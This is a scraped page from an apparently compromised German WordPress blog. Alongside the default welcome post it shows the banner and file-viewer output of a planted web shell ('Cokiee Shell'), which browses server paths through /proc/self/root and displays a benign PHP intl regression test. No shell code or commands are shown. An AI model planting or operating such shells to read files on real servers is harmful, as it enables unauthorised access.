Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/intl/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/intl/tests/bug60192-sort.phpt |
--TEST-- Bug #60192 (SegFault when Collator not constructed properly) --SKIPIF-- <?php if (!extension_loaded('intl')) { die('skip intl extension not available'); } ?> --FILE-- <?php class Collator2 extends Collator{ public function __construct() { // omitting parent::__construct($someLocale); } } $c = new Collator2(); $a = array('a', 'b'); $c->sort($a); --EXPECTF-- Fatal error: Uncaught Error: Object not initialized in %s:%d Stack trace: #0 %s(%d): Collator->sort(Array) #1 {main} thrown in %s on line %d
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare